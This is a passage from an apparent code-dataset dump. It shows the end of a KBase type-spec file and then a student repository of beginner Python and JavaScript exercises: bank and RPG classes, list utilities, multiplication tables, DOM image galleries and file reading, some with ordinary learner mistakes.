KButil_Build_AssemblySet (KButil_Build_AssemblySet_Params params) returns (KButil_Build_AssemblySet_Output) authentication required;\n\n\n /* KButil_Batch_Create_ReadsSet()\n **\n ** Method for creating a ReadsSet without specifying individual objects\n */\n typedef structure {\n workspace_name workspace_name;\n\tstring name_pattern;\n data_obj_name output_name;\n\tstring desc;\n } KButil_Batch_Create_ReadsSet_Params;\n\n typedef structure {\n\tdata_obj_name report_name;\n\tdata_obj_ref report_ref;\n } KButil_Batch_Create_ReadsSet_Output;\n\n funcdef KButil_Batch_Create_ReadsSet (KButil_Batch_Create_ReadsSet_Params params) returns (KButil_Batch_Create_ReadsSet_Output) authentication required;\n\n\n /* KButil_Batch_Create_AssemblySet()\n **\n ** Method for creating an AssemblySet without specifying individual objects\n */\n typedef structure {\n workspace_name workspace_name;\n\tstring name_pattern;\n data_obj_name output_name;\n\tstring desc;\n } KButil_Batch_Create_AssemblySet_Params;\n\n typedef structure {\n\tdata_obj_name report_name;\n\tdata_obj_ref report_ref;\n } KButil_Batch_Create_AssemblySet_Output;\n\n funcdef KButil_Batch_Create_AssemblySet (KButil_Batch_Create_AssemblySet_Params params) returns (KButil_Batch_Create_AssemblySet_Output) authentication required;\n\n\n /* KButil_Batch_Create_GenomeSet()\n **\n ** Method for creating a GenomeSet without specifying individual objects\n */\n typedef structure {\n workspace_name workspace_name;\n\tstring name_pattern;\n data_obj_name output_name;\n\tstring desc;\n } KButil_Batch_Create_GenomeSet_Params;\n\n typedef structure {\n\tdata_obj_name report_name;\n\tdata_obj_ref report_ref;\n } KButil_Batch_Create_GenomeSet_Output;\n\n funcdef KButil_Batch_Create_GenomeSet (KButil_Batch_Create_GenomeSet_Params params) returns (KButil_Batch_Create_GenomeSet_Output) authentication required;\n\n\n\n};\n\n"
}
] | 5 |
greenfox-academy/HDodek
|
https://github.com/greenfox-academy/HDodek
|
3eff3fff1325fd46757e9e9320f1106ce1324cb1
|
49be69d3f9c744945bbf35d4b1462e6191826a63
|
3af970c3a326679a21da255383b00418a66b7c66
|
refs/heads/master
| 2021-01-10T10:51:16.467301 | 2016-01-21T23:49:35 | 2016-01-21T23:49:35 | 45,946,509 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5126262903213501,
"alphanum_fraction": 0.5454545617103577,
"avg_line_length": 16.217391967773438,
"blob_id": "43632a218ac24cf0f914fe8060729f376b0c5fd3",
"content_id": "e64f9481877fcf1ca2b0606e6d40f3f725cfa4f2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 396,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 23,
"path": "/week-4/practice/35.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "numbers = [3, 4, 5, 6, 7]\n\ndef reverse():\n output = []\n num = len(numbers) - 1\n while num >= 0:\n output.append(numbers[num])\n num -= 1\n return output\n\nprint(reverse())\n\n\n\ndef reverse2(input_list):\n output_list = []\n i = len(input_list) - 1\n while i >= 0:\n output_list.append(input_list[i])\n i -= 1\n return output_list\n\nprint(reverse2(numbers))\n"
},
{
"alpha_fraction": 0.4804270565509796,
"alphanum_fraction": 0.5255041718482971,
"avg_line_length": 19.071428298950195,
"blob_id": "d87592e6c25c6ce3e25c8c2a181f5ce892872b91",
"content_id": "0cc6d6f373d0e788cca3fe4dc38f6411de797fc4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 843,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 42,
"path": "/week-7/wednesday/multiply.js",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "\"use strict\";\n\nfunction multiply(number) {\n for (var i = 1; i <= 10; i++)\n console.log(String(i), '*', String(number), '=', number * i);\n}\n\nmultiply(5);\n\n\nfunction multiplyAll() {\n for (var a = 1; a <= 10; a++) {\n for (var b = 1; b <= 10; b++) {\n console.log(String(b), '*', String(a), '=', a * b);\n }\n }\n}\n\nmultiplyAll()\n\n//for, forEach, map, reduce\n\nvar szorzotabla1 = \"\";\n\nfor (var i = 1; i <= 10; i++) {\n szorzotabla1 += i + \"*\" + 4 + \"=\" + i*4 + '\\n';\n}\nconsole.log(szorzotabla1);\n\nvar szamok = [1, 2, 3, 4, 5, 6, 7, 8, 10];\nvar szorzotabla2 = \"\";\nszamok.forEach(function (e) {\n szorzotabla2 += e + \"*\" + 4 + \"=\" + e * 4 + '\\n';\n})\nconsole.log(szorzotabla2);\n\nvar szorzotabla3 = \"\";\nvar sorok = szamok.map(function (e) {\n return e + \"*\" + 4 + \"=\" + e * 4;\n});\nszorzotabla3 = sorok.join('\\n');\nconsole.log(szorzotabla3);\n"
},
{
"alpha_fraction": 0.5826494693756104,
"alphanum_fraction": 0.6072684526443481,
"avg_line_length": 26.516128540039062,
"blob_id": "33c1ab8bbda8a916b090a32b7f216edc6cd291c3",
"content_id": "a27070c0b906dc63b62afbedc66af37689a8693b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 853,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 31,
"path": "/week-4/monday/rpg.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "class Game_Character():\n def __init__(self, name, health_potions, damage):\n self.name = name\n self.health_potions = health_potions\n self.damage = damage\n\n def print_status(self):\n if self.health_potions <= 0:\n print(self.name + \" \" + \"is dead!\")\n elif self.health_potions > 0:\n print(self.name + \" \" \"HP \" + str(self.health_potions))\n\n def drink_potion(self):\n self.health_potions += 10\n\n def strike(self, other):\n other.health_potions -= self.damage\n\nclass Wizard(Game_Character):\n def heal(self, ally):\n ally.health_potions += 10\n\nalena = Game_Character(\"Alena\", 100, 50)\nbergu = Game_Character(\"Bergu\", 65, 150)\nmelkor = Wizard(\"Melkor\", 60, 60)\n\nalena.print_status()\nfor i in range(2):\n bergu.strike(alena)\n melkor.heal(alena)\nalena.print_status()\n"
},
{
"alpha_fraction": 0.5714285969734192,
"alphanum_fraction": 0.60317462682724,
"avg_line_length": 8,
"blob_id": "9a6a3a41419f4b6f708c26fd4a658d11f80ae57c",
"content_id": "6b1778aa5cb298164662393325694b115f65ec79",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 63,
"license_type": "no_license",
"max_line_length": 15,
"num_lines": 7,
"path": "/week-7/wednesday/hoisting.js",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "\"use strict\";\n\nvar a;\nconsole.log(a);\n\na = 12;\nconsole.log(a);\n"
},
{
"alpha_fraction": 0.5,
"alphanum_fraction": 0.5625,
"avg_line_length": 7,
"blob_id": "608d64317695152fb3b5005fe8871d78430d03b1",
"content_id": "af8e196e2ac8a4541c4c9068fb1c079c5f4fba3d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 48,
"license_type": "no_license",
"max_line_length": 17,
"num_lines": 6,
"path": "/week-7/tuesday/helloworld.js",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "\"use strict\";\n\nvar a = 123;\n\n\nconsole.log(++a);\n"
},
{
"alpha_fraction": 0.5894245505332947,
"alphanum_fraction": 0.6143079400062561,
"avg_line_length": 21.964284896850586,
"blob_id": "8c989501d479c4b1a0a484d44c017ee9a865fd85",
"content_id": "e1c274af3e43bcb154e8e8ae8dd76f32304f1975",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 643,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 28,
"path": "/week-4/monday/bank.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "class Bank_account:\n def __init__(self, name, balance):\n self.name = name\n self.balance = balance\n\n def pay(self, amount):\n self.balance -= amount\n\n def receive(self, amount):\n self.balance += amount\n\n def print_balance(self):\n print (\"balance of \")\n print(self.name)\n print(\"is\")\n print(self.balance)\n\n def transfer(self, other_account, amount):\n self.pay(amount)\n other_account.receive(amount)\n\nferi = Bank_account( \"Feri\", 700000)\nszamla = Bank_account(\"Bela\", 1000)\nszamla.pay(50)\n\nszamla.transfer(feri, 6000)\nferi.print_balance()\nszamla.print_balance()\n"
},
{
"alpha_fraction": 0.5549132823944092,
"alphanum_fraction": 0.5664739608764648,
"avg_line_length": 14.727272987365723,
"blob_id": "5d61a8a6241b9d3561a8164eb16c0bc85246fee7",
"content_id": "f542e8885075cef5c197294d04b1076361dc20fa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 173,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 11,
"path": "/week-7/practice/range2.js",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "\"use strict\";\n\nfunction range(first, last) {\n var output = [];\n for (var i = first; i <= last; i++){\n output.push(i);\n }\n return output;\n}\n\nconsole.log(range(3, 6));\n"
},
{
"alpha_fraction": 0.6686046719551086,
"alphanum_fraction": 0.6744186282157898,
"avg_line_length": 16.200000762939453,
"blob_id": "0203bf29d6f41614dd8268525d6be363bd274668",
"content_id": "ad2a47e6f41a1e6d5ed399d946c383b51ead5d71",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 172,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 10,
"path": "/week-4/tuesday/crypt/reversed_zen_order_solution.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "my_file = open( \"reversed_zen_order.txt\")\n\nlines = my_file.readlines()\n\nmy_file.close()\n\nreversed_lines = lines[::-1]\n\nfor line in reversed_lines:\n print(line.rstrip())\n"
},
{
"alpha_fraction": 0.5447154641151428,
"alphanum_fraction": 0.5447154641151428,
"avg_line_length": 9.25,
"blob_id": "26f865ecd8ff4267841a9fab13930c213a8b66d1",
"content_id": "afc238335e3215aa3f7e036fa560822eeb425a43",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 123,
"license_type": "no_license",
"max_line_length": 27,
"num_lines": 12,
"path": "/week-4/practice/30.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "ae = \"Jozsi\"\n\ndef greet():\n print( \" Hello\" + ae)\n\ngreet()\n\n---\ndef greet(name):\n print(\"Szevasz\" + name)\n\ngreet(ae)\n"
},
{
"alpha_fraction": 0.7096773982048035,
"alphanum_fraction": 0.7161290049552917,
"avg_line_length": 50.66666793823242,
"blob_id": "5156c4e97c1873356ded1a9c0b3b36efa000126a",
"content_id": "71ada1565c41647fd6ba8ba3de94e277dc4d02f4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 155,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 3,
"path": "/week-7/md.md",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "# Why *you* should use Markdown to write your next blog post\n\n[Markdown][1] is just so dang legible, it will make your *whole life* easier. **I promise.**\n"
},
{
"alpha_fraction": 0.46875,
"alphanum_fraction": 0.5078125,
"avg_line_length": 13.222222328186035,
"blob_id": "c3e992102e06655e9c475f3977f429b727bb9c54",
"content_id": "89609c518e841e1d0c17ad899cec7b9c4b98350e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 384,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 27,
"path": "/week-7/practice/1.js",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "\"use strict\";\n\nvar grades = [4, 3, 5, 2, 5, 5];\n\nfunction count5s() {\n var output = 0;\n for (var i = 0; i < grades.length; i++) {\n if (grades[i] === 5) {\n output += 1;\n }\n }\n return output;\n}\n\nconsole.log(count5s());\n\nfunction foreach() {\n var out = 0;\n grades.forEach(function(e) {\n if (e === 5) {\n out += 1;\n }\n})\n return out;\n};\n\nconsole.log(foreach());\n"
},
{
"alpha_fraction": 0.5102880597114563,
"alphanum_fraction": 0.5432098507881165,
"avg_line_length": 17.69230842590332,
"blob_id": "09d1b9edfe86f18576b07c77d0e3b192edd03b53",
"content_id": "2d8b6114dd1a16b920e5300e1ba20170aa4a96a6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 243,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 13,
"path": "/week-4/practice/car2.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "class Car:\n def __init__(self, color, type, km):\n self.color = color\n self.type = type\n self.km = km\n\n def ride(self, km):\n self.km += km\n\ntesla = Car(\"pink\", \"TeslaX\", 1200)\ntesla.ride(2300)\n\nprint(tesla.km)\n"
},
{
"alpha_fraction": 0.5429936051368713,
"alphanum_fraction": 0.6035031676292419,
"avg_line_length": 27.545454025268555,
"blob_id": "700aff9c2fe4086221b43cf7401f1fb780a48db0",
"content_id": "b570b79b8d2ec8c036b0984923d4b3831f15bd40",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1256,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 44,
"path": "/week-5/monday/rpg/wizard_test.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom wizard import Wizard\n\nclass TestWizard(unittest.TestCase):\n def test_existance(self):\n wizard = Wizard(\"Test\", 40, 10, 20)\n\n def test_inheritance(self):\n wizard = Wizard(\"Test\", 40, 10, 20)\n self.assertEqual(wizard.hp, 40)\n\n def test_manna(self):\n wizard = Wizard(\"Test\", 40, 10, 20)\n self.assertEqual(wizard.manna, 20)\n\n def test_strike(self):\n wizard = Wizard(\"Test\", 40, 10, 20)\n opponent = Wizard(\"Opponent\", 40, 10, 20)\n wizard.strike(opponent)\n self.assertEqual(wizard.manna, 15)\n\n def test_no_manna(self):\n wizard = Wizard(\"Test\", 40, 10, 0)\n opponent = Wizard(\"Opponent\", 40, 10, 20)\n wizard.strike(opponent)\n self.assertEqual(wizard.manna, 0)\n\n def test_more_than_5_manna(self):\n wizard = Wizard(\"Test\", 40, 10, 20)\n opponent = Wizard(\"Opponent\", 40, 10, 20)\n self.assertEqual(wizard.manna, 15)\n wizard.strike(opponent)\n sels.assertEqual(opponent.hp, 0)\n\n def test_strike_without_manna(self):\n wizard = Wizard(\"Test\", 40, 5, 0)\n opponent = Wizard(\"Opponent\", 40, 10, 20)\n wizard.strike(opponent)\n self.assertEqual(opponent.hp, 27)\n\n\n\n\nunittest.main()\n"
},
{
"alpha_fraction": 0.6359090805053711,
"alphanum_fraction": 0.7159090638160706,
"avg_line_length": 32.846153259277344,
"blob_id": "dd4f43f7e1177dbfe7c978d9574d300efffb32ec",
"content_id": "6ce2fbcbed8cfdf4d2893a384538eb766a14b4f4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 2200,
"license_type": "no_license",
"max_line_length": 128,
"num_lines": 65,
"path": "/week-7/thursday/majom.js",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "\"use strict\";\n\nconsole.log(\"mukodik\");\n\nvar cim = document.querySelector(\".majom\");\nconsole.log(cim);\n\ncim.classList.add(\"piros\");\n\nvar majomkep = document.querySelector(\"img\");\nmajomkep.setAttribute(\"src\", \"https://41.media.tumblr.com/84729c469ca431c8c80dad1cd4281205/tumblr_o08zo7SJan1tx21ogo1_540.jpg\");\n\nfunction kepcsinalo(src) {\n var ujkep = document.createElement(\"img\");\n ujkep.setAttribute(\"src\", src);\n\n var bodyvaltozoban = document.querySelector(\"body\")\n bodyvaltozoban.appendChild(ujkep);\n}\nfor (var i = 0; i < 10; i++) {\nkepcsinalo(\"https://41.media.tumblr.com/84729c469ca431c8c80dad1cd4281205/tumblr_o08zo7SJan1tx21ogo1_540.jpg\");\n};\n\nvar kepek = [\n \"https://s-media-cache-ak0.pinimg.com/736x/eb/ff/38/ebff38063b30af2bd2abaa79827a3fd3.jpg\",\n \"http://cdn.meme.am/instances/500x/53203200.jpg\",\n \"http://lorempixel.com/image_output/cats-q-c-301-222-9.jpg\",\n \"http://lorempixel.com/image_output/animals-q-c-448-371-1.jpg\",\n \"http://lorempixel.com/image_output/city-q-c-448-371-2.jpg\",\n \"http://lorempixel.com/image_output/people-q-c-448-371-5.jpg\",\n \"http://lorempixel.com/image_output/food-q-c-448-371-6.jpg\",\n \"http://lorempixel.com/image_output/food-q-c-448-371-4.jpg\",\n \"http://lorempixel.com/image_output/nightlife-q-c-448-371-3.jpg\",\n \"http://lorempixel.com/image_output/nature-q-c-448-371-7.jpg\"\n]\nfor (var i = 0; i < kepek.length; i++) {\n kepcsinalo(kepek[i]);\n};\n\nvar gomb = document.querySelector(\".csing\");\n\n//gomb.addEventListener(\"click\", function () {\n// alert(\"kattintottam!!\");\n//});\n\ngomb.addEventListener(\"click\", function () {\n kepcsinalo(\"https://media.giphy.com/media/vhsNmFjuN4WDS/giphy.gif\")\n});\nwindow.addEventListener(\"scroll\", function (){\n console.log(\"scroll\"),\n console.log(window.scrollY);\n});\n\n\nvar cicagomb = document.querySelector(\".cicat\");\nvar kajagomb = document.querySelector(\".kajat\");\nvar valtokep = document.querySelector(\".cicakaja\");\n\nkajagomb.addEventListener(\"click\", function() {\n valtokep.setAttribute(\"src\", \"http://lorempixel.com/image_output/nature-q-c-448-371-7.jpg\");\n});\n\ncicagomb.addEventListener(\"click\", function() {\n valtokep.setAttribute(\"src\", \"http://lorempixel.com/image_output/cats-q-c-301-222-9.jpg\");\n});\n"
},
{
"alpha_fraction": 0.5419847369194031,
"alphanum_fraction": 0.5419847369194031,
"avg_line_length": 25.200000762939453,
"blob_id": "b87031b640b2938e9f65c338b2a26d7d75e88320",
"content_id": "78717ac67e902eb86b0a7ef0d8d9877b8feb91b6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 262,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 10,
"path": "/week-3/wednesday/reverse.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "class SuperString(object):\n def __init__(self, my_greet):\n self.greet = greet\n\n def reversed(self):\n n = len(self.greet)\n reversed = \"\"\n for i in range(n):\n reversed = self.greet(i) + reversed\n return reversed\n"
},
{
"alpha_fraction": 0.562974214553833,
"alphanum_fraction": 0.5720788836479187,
"avg_line_length": 15.897436141967773,
"blob_id": "3cc362207f52df91f5bd13cedd13af777208c55a",
"content_id": "ff174449a5e2ff524e4819ef36e477001fa8276b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 659,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 39,
"path": "/week-3/tuesday/list.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "class Elem(object):\n _slots_ = [\n \"value\",\n \"next\"\n]\n\ndef _repr_(self):\n return \"({}, {})\".format(self.value, self.next)\n\ndef new_elem(value):\n elem = Elem()\n elem.value = value\n elem.next = None\n return elem\n\ndef append(head, value):\n end = head\n while end.next is not None:\n end = end.next\n end.next = new_elem(value)\n return head\n\nhead = insert(head, 1, 3)\ndef insert(head, index, value):\n if index = 0:\n new = new_elem(value)\n new.next = head\n return new\n\n\ndef remove(head,index):\n prev=head\n i=0\n while i<index-1:\n prev=prev.next\n i+=1\n\nelem = prev.next\nprev.next = elem.next\n"
},
{
"alpha_fraction": 0.5684210658073425,
"alphanum_fraction": 0.6000000238418579,
"avg_line_length": 11.666666984558105,
"blob_id": "1bfcba2b31400e3ae29aaeac9fd8eb43939f446d",
"content_id": "94af3e6bc84ed9de537a79e6c9bd22bb2fe67bd6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 190,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 15,
"path": "/week-7/wednesday/scope2.js",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "\"use strict\";\n\nvar glob = 7;\nvar c = 8;\n\nfunction printLocal() {\n var a = 123\n var c = 9\n console.log(a);\n console.log(glob);\n console.log('local', c);\n}\n\nprintLocal();\nconsole.log(c);\n"
},
{
"alpha_fraction": 0.5645569562911987,
"alphanum_fraction": 0.5721518993377686,
"avg_line_length": 18.75,
"blob_id": "2371ba9c75afdfa3b07bad4055282e43385a5abe",
"content_id": "3e8a719783fda98133c8678fbc79dbe767974479",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 395,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 20,
"path": "/week-8/thursday/callback4.js",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "\"use strict\"\n\nvar fs = require(\"fs\");\n\nfunction countLetterP(callback) {\n fs.readFile(\"alma.txt\", function(err, content) {\n var count = 0;\n var stringoutput = String(content);\n for (var i = 0; i < stringoutput.length; i++) {\n if (stringoutput[i] === \"p\") {\n count++;\n }\n }\n callback(count);\n })\n}\n\ncountLetterP(function(count) {\n console.log(count); //2//\n});\n"
},
{
"alpha_fraction": 0.6187050342559814,
"alphanum_fraction": 0.6258992552757263,
"avg_line_length": 14.44444465637207,
"blob_id": "837257bc61e27214055cdb673f761fec621c0a33",
"content_id": "ea1ea296323dfd531bdcda8a1083668e0bdac1c4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 139,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 9,
"path": "/week-4/tuesday/crypt/reversed_zen_lines_solution.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "my_file = open( \"reversed_zen_lines.txt\")\n\nlines = my_file.readlines()\n\n\nfor line in lines:\n print(line[::-1], end=\"\")\n\nmy_file.close()\n"
},
{
"alpha_fraction": 0.5489130616188049,
"alphanum_fraction": 0.5597826242446899,
"avg_line_length": 25.14285659790039,
"blob_id": "6e337a96cec9a7c76606f8e6b4332c0b7ad36d6c",
"content_id": "13ea52157cee4198f04982be64614e944c67da46",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 184,
"license_type": "no_license",
"max_line_length": 32,
"num_lines": 7,
"path": "/week-5/monday/countletters/countletters.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "\ndef count_letters(input_string):\n output = {}\n for char in input_string:\n if not char in output:\n output[char] = 0\n output[char] += 1\n return output\n"
},
{
"alpha_fraction": 0.4161073863506317,
"alphanum_fraction": 0.46979865431785583,
"avg_line_length": 8.3125,
"blob_id": "3b90dfab81d62de0b42800257c088359c5a74c6d",
"content_id": "39d3a2e8686609f9ab31dbba8da8354a8d9deb3f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 149,
"license_type": "no_license",
"max_line_length": 20,
"num_lines": 16,
"path": "/week-4/practice/29.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "ad = [3, 4, 5, 6, 7]\ni = 0\nsumma = 0\n\nwhile i < len(ad):\n summa += ad[i]\n i += 1\n\nprint(summa)\n\n---\n\nfor n in ad:\n summa += n\n\nprint(summa)\n"
},
{
"alpha_fraction": 0.6990185379981995,
"alphanum_fraction": 0.7044711112976074,
"avg_line_length": 20.325580596923828,
"blob_id": "53457ddb45fde5942a95644fc87040f0a842179b",
"content_id": "0bb8dd4a4c691a66933b8acbf10613ef242b2e5c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 917,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 43,
"path": "/week-7/project_gallery/gallery.js",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "\"use strict\"\n\nvar nextbutton = document.querySelector(\".next\");\nvar previousbutton = document.querySelector(\".previous\");\nvar currentpicture = document.querySelector(\".currentpicture\");\n\n\nvar pictures = [\n \"pictures/first.jpg\",\n \"pictures/ballett.jpg\",\n \"pictures/jazz.jpg\",\n \"pictures/thai.jpg\"\n];\n\nvar currentIndex = 0;\n\nfunction nextPicture() {\n currentIndex++;\n if (currentIndex > pictures.length -1) {\n currentIndex = 0;\n }\n currentpicture.setAttribute(\"src\", pictures[currentIndex]);\n};\n\nfunction previousPicture() {\n currentIndex--;\n if (currentIndex === -1) {\n currentIndex = pictures.length -1;\n }\n currentpicture.setAttribute(\"src\", pictures[currentIndex]);\n};\n\nnextbutton.addEventListener(\"click\", function() {\n nextPicture();\n});\n\npreviousbutton.addEventListener(\"click\", function() {\n previousPicture();\n});\n\ncurrentpicture.addEventListener(\"click\", function() {\n nextPicture();\n});\n"
},
{
"alpha_fraction": 0.6128048896789551,
"alphanum_fraction": 0.6189024448394775,
"avg_line_length": 12.666666984558105,
"blob_id": "6a93f89deb1b1592ad6787ae9bdb1fc7c156fa04",
"content_id": "2f75e448386a66e92ddc013f6ee3816c67ade4e2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 328,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 24,
"path": "/week-7/wednesday/func.js",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "\"use strict\";\n\nfunction greet(name) {\n console.log(\"Hello \", name);\n}\n\ngreet(\"Dorka\");\n\n\nvar koszontes = greet;\nkoszontes(\"Geza\");\n\nvar print = console.log;\nprint(\"svbb\")\n\n\nfunction greeter(name, log) {\n log (\"csako\", name);\n}\ngreeter(\"lajcsi\", print);\n\n\nvar add = function (a, b) { return(a + b); } ;\nconsole.log(add(1, 2));\n"
},
{
"alpha_fraction": 0.6140350699424744,
"alphanum_fraction": 0.6140350699424744,
"avg_line_length": 22.15625,
"blob_id": "e0fbea6f9aa16eb5ad49bd1a54ce0d5ff2aa22c1",
"content_id": "46b74107325ec5a8012009644a7a15d042eb6df0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 741,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 32,
"path": "/week-4/practice/42.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "filename = \"alma.txt\"\n\ndef read_and_add_a(filename):\n read_file = open(filename)\n file_content = read_file.readlines()\n read_file.close()\n output = \"\"\n for line in file_content:\n print(\"a\" + line.rstrip())\n\nprint(read_and_add_a(filename))\n\n\ndef read_and_add_a(filename):\n read_file = open(filename)\n file_content = read_file.read()\n read_file.close()\n for line in file_content.split(\"\\n\"):\n print(\"a\" + line)\n\nread_and_add_a(filename)\n\ndef read_and_add_a(filename):\n read_file = open(filename)\n file_content = read_file.read()\n read_file.close()\n output = \"\"\n for line in file_content.split(\"\\n\"):\n output += \"a\" + line + \"\\n\"\n return output\n\nprint(read_and_add_a(filename))\n"
},
{
"alpha_fraction": 0.6268292665481567,
"alphanum_fraction": 0.6439024209976196,
"avg_line_length": 19.5,
"blob_id": "da6d3983742863834b29534dc2c03a621a8583cf",
"content_id": "42ddc52d260390f7538d0a11e00bde0cb35f6a14",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 410,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 20,
"path": "/week-5/tuesday/decorator_test.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom decorator import Rusty\n\nclass RustyTest(unittest.TestCase):\n def test_rusty_effect(self):\n weapon = Rusty(TestWeapon)\n self.assertEqual(5, weapon.damage())\n self.assertEqual(15, RustyHace().damage)\n\n\nclass TestWeapon():\n def damage(self):\n return 10\nclass TestHace:\n def damage(self):\n return 30\n\n\nif __name__== \"__main__\":\n untittest.main()\n"
},
{
"alpha_fraction": 0.5268816947937012,
"alphanum_fraction": 0.5537634491920471,
"avg_line_length": 10.625,
"blob_id": "9d493e91230d8489bd4591e1459831bda2095ffb",
"content_id": "78ee3cd61c3bfdfe32fa0ef4836d088682524493",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 186,
"license_type": "no_license",
"max_line_length": 28,
"num_lines": 16,
"path": "/week-4/practice/32.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "ag = \"kuty\"\n\ndef my_word(string):\n return string + \"a\"\n\nag = my_word(ag)\nprint(ag)\n\n\n\nag2 = [\"cic\", \"kacs\", \"alm\"]\n\nfor i in range(len(ag2)):\n ag2[i] = my_word(ag2[i])\n\nprint(ag2)\n"
},
{
"alpha_fraction": 0.5853658318519592,
"alphanum_fraction": 0.5934959053993225,
"avg_line_length": 29.75,
"blob_id": "580190482a4f298efbace7d82ed9ab652cd5f102",
"content_id": "f893ad2ee66f287f0a29cc708b4fa4ae392f2a92",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 123,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 4,
"path": "/week-5/tuesday/observer2.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "class BattleField:\n def __notify__(self, type, warrior):\n if type == \"movement\" and\n warrior.movement(-5)\n"
},
{
"alpha_fraction": 0.4600938856601715,
"alphanum_fraction": 0.48356807231903076,
"avg_line_length": 9.142857551574707,
"blob_id": "695aaf8e6615091cef9a43cc50c5f116b2e34e4e",
"content_id": "547786d5339af97b19d46b3b57c6a7e842025eae",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
